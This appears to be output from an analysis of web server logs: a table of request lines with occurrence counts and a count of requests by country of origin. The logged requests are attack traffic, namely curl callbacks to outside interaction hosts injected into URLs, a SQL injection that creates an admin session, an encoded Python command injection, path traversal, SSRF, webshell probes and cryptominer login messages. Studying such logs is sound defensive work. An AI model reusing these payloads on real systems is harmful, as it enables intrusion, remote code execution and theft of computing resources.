939	2	GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d0l235hfbd6ifhi9kb1gjqo1jktu3aqap.oast.live+-H+%27User-Agent:+fyQPB3%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d0l235hfbd6ifhi9kb1g38kijb57gxw3n.oast.live+-H+%27User-Agent:+fyQPB3%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
940	2	GET /include/waay.txt HTTP/1.1
941	2	POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+IpAddress=%27144.24.88.37%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272xHOXWKdVW4qhvJ18mKUlzs5HmO%27%23 HTTP/1.1
942	2	GET /forms/doLogin?login_username=admin&password=password$(curl%20d0l23ge3tjmd51ltm35gaqhz97qwahm8i.oast.pro)&x=0&y=0 HTTP/1.1
943	2	GET /2xHOXW81fSaF8D5QMUpGUUST7Em HTTP/1.1
944	2	GET /assets/data/usrimg/2xhoxdvzkd4zbdt07rbkuyxkyjv.php HTTP/1.1
945	2	PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
946	2	GET /WSgDScgHdA.txt HTTP/1.1
947	2	GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e684954324e775648686a625752774e30527255555a4d5955317a566c6c4752304e3222207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1
948	2	GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2xHOd3rQFjJi7Fkd2czqTaWbBBY.txt HTTP/1.1
949	2	POST /lucee/2xHOcoFQucyXG4pRs5W7ZpISUJv.cfm HTTP/1.1
950	2	GET /wp-content/plugins/imagements/images/2xhodhbes6pp1fywk9jh46prmmy.php HTTP/1.1
951	2	GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2xHOXQBkXSlbvkxZlepk4xHDX2B.php HTTP/1.1
952	2	POST /wp-content/plugins/wpcargo/includes/2xHOXQBkXSlbvkxZlepk4xHDX2B.php?1=var_dump HTTP/1.1
953	2	GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d0l23ge3tjmd51ltm35gds7xn7wanikhu.oast.pro%23 HTTP/1.1
954	2	GET /upload/userfiles/image/2xHOXRK5lH5abkL0TdMm28JNkZG.png HTTP/1.1
961	1	\x00\x0E8\x09&b\xA6\x89\xE6\xFED\x00\x00\x00\x00\x00
972	1	GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20d0l23ge3tjmd51ltm35g5wam9m9bdmp6c.oast.pro%20-H%20’User-Agent%3a%20WEMv0Y’; HTTP/1.1
973	1	GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20d0l235hfbd6ifhi9kb1gp6bmr1hguduyx.oast.live%20-H%20’User-Agent%3a%20KtWTxS’; HTTP/1.1
974	1	DELETE /actuator/gateway/routes/2xHOciW0d1yOqq4dmOHvrp9qN4p HTTP/1.1
975	1	DELETE /actuator/gateway/routes/2xHOXnxsx9r2UrUyuyrKqkjoQTJ HTTP/1.1
976	1	PUT /cgi-bin/JKVIEZ.txt HTTP/1.1
977	1	DELETE /cgi-bin/JKVIEZ.txt HTTP/1.1
978	1	PUT /2xHOcy3pb9az5JeVh7awXaJoQbP.txt HTTP/1.1
981	1	DELETE /cgi-bin/kRoMh2.txt HTTP/1.1
982	1	PUT /cgi-bin/kRoMh2.txt HTTP/1.1
983	1	PUT /2xHOXPT7w51sLylW86RHNNYZhTB.txt HTTP/1.1
986	1	GET /2xHOdA4UxItWCSi40QtRMSBa3k3/../../ThinVnc.ini HTTP/1.1
987	1	GET /2xHOXggNmHguovA33T47i4Myxde/../../ThinVnc.ini HTTP/1.1
988	1	PUT /fileserver/2xHOd9J78X8NWD8TY3fw0z3ZEv8.txt HTTP/1.1
990	1	PUT /fileserver/2xHOXc8rJzZ0QlQwbVUpiwQQNpH.txt HTTP/1.1
1014	1	\x00\x0E8\x07\xB0\xE9\x8CpVd\xF1\x00\x00\x00\x00\x00
1019	1	PUT /0aElmJ.session HTTP/1.1
1030	1	PUT /7vJVKl.session HTTP/1.1
1032	1	{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x6f292b901645cb5424e348d54ed0b2a01d6f1ff2\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
1033	1	{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2249Tf5dwN9xBQXoYS2CB8coJyXYDz6q7mE43GqqCcSvTpgYLfnCmu6GjTPdQLveYwKd9MHdEbLFBek8PaPrRohsRTBuun3zK\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
1058	1	\x00\x0E8\x9C6\x5CL\xD5\xDB*.\x00\x00\x00\x00\x00
1059	1	\x00\x0E8?\x17\xDD\xFF\x0B&\xE8\xDC\x00\x00\x00\x00\x00

country_iso_code
#

	number_of_occurence	country_iso_code
0	1967	BR
1	1951	KR
2	386	BG
3	154	US
4	73	PL
5	62	CH
6	51	ID
7	49	DE
8	47	NL
9	45	VN
10	37	GB
11	27	CN
12	22	LT
13	18	SC
14	14	CA
15	13	GH
16	13	AZ
17	10	IL
18	9	HK
19	9	IN
20	6	RO
21	5	SG
22	5	JP
23	5	BE
24	4	RU
25	3	IR
26	3	FR
27	3	UA
28	2	AO
29	2	SA
30	1	ES
31	1	MC
32	1	MN
33	1	ZA